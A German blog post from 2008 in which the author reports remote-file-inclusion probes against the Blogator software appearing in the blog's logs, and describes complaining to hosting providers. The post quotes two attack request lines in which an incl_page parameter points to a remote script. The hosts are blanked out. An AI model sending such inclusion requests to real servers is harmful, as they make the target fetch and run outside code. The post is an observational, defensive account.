Saturday, 5. April 2008Falsche Lücke
Hätte ich nur am Montag keinen Link auf ein Blog namens "blogator" gesetzt... Jetzt wird dieser Beitrag bei irgendwelchen Suchmaschinen mit diesem Begriff gefunden und jedes script kiddie probiert mal aus, ob er bei mir die Sicherheitslücke der zufällig gleichnamigen französischen Blogsoftware ausnützen kann. Ihr könnt mich damit in Ruhe lassen, ich verwende eine andere Software, die bestimmt Lücken, aber halt andere hat.
Mein Log ist jedenfalls voll von Versuchen der Art GET /2008/03/31/kurzer-ausflug-nach-25// include/struct_admin.php? incl_page= http://---irgendein-provider---/ imgcls/cmd2.txt????? Wenn man dann bei ---irgendein-provider---/ imgcls/cmd2.txt nachschaut, was da eingebunden wird, findet man ein Script, das anscheinend nur Betriebssystem, Username und Plattenplatz ausgibt. Nichts weiter tragisches, anscheinend nur die Vorbereitung spezifischerer Versuche. Die Versuche finden ausschliesslich bei diesem Beitrag statt, sind also kein Rundumschlag in irgendwelchen Blogs, sondern bestimmt das Ergebnis einer Suche bei irgendeiner Suchmaschine. Zwei dieser Webprovider hab ich mal testweise angeschrieben, dass sie ihren Kunden bitte bescheidgeben:
Die Kunden können natürlich auch wenig dafür (ausser dass sie hackbare Anwendungen ins Netz stellen), aber sie sollten wenigstens informiert sein, dass ihre Homepage über z.B. "Entgiftungspflaster mit der Kraft alter Bäume" im Nebenjob als Virenschleuder dient. Viel Erfolg versprech ich mir davon aber nicht. Bei den meisten Providern beschränkt sich das Abuse-Handling auf den Aufbau von Hürden für den Beschwerdeführer. Ausser den aufgemachten Servern mit dem Script gibts noch einen zweiten Beteiligten, den der diese URL zusammenbastelt und bei mir aufruft. Ich vermute aber, der kann auch nichts dafür, das geht auch schon automatisch ohne Wissen und Beteiligung des Menschen vor dem Monitor. Anderfalls wären die Leute entweder alle mit Textbrowsern unterwegs oder würden im Sekundentakt den Browser wechseln (oder dessen Identifikation mit jedem aufruf wechseln lassen). Wäre denkbar, aber für Kinder eher untypisch... Die Internetprovider dieser Leute kann ich allerdings nicht anschreiben. Da ich hier ja auf die Speicherung der IP-Adressen der Besucher verzichte, kann ich für vergangene Zugriffe die IP-Adresse der Besucher nur ungefähr sagen. Z.B. kommt dann ein verstümmeltes "bzrhbcesvl.schulradio-bayern.de" raus, damit brauche ich beim Provider nicht ankommen. Und aussschalten mag ich die Pseudonymisierung jetzt auch nicht, dazu werden auch bei Internetprovidern Hinweise der Art "He Dein Kunde hackt hier rum oder hat nen Virus" zu missmutig bearbeitet. Nachtrag: Die suchen bei Technorati oder Google-Blogsuche nach "blogator". 2 Stunden nach Veröffentlichung tauchen die ersten Zugriffe auf diesen Beitrag auf: /2008/04/05/falsche-luecke// _blogadata/ include/ struct_admin.php? incl_page= http:// ---egal --- /ioncube/readme.txt?? Nachtrag 2: 5 Stunden nach meiner Mail hat übrigens Geocities die Seite abgeklemmt. Ich weiss natürlich nicht, ob ich der einzige war, der was geschrieben hat, vermutlich suchen die auch selbst ihre Seiten nach Schädlingen ab. Die schnelle Reaktion hat mich jedenfalls überrascht.
« vorherige Seite
(Seite 2 von 2, insgesamt 6 Einträge)
|
KategorienVerwaltung des Blogs |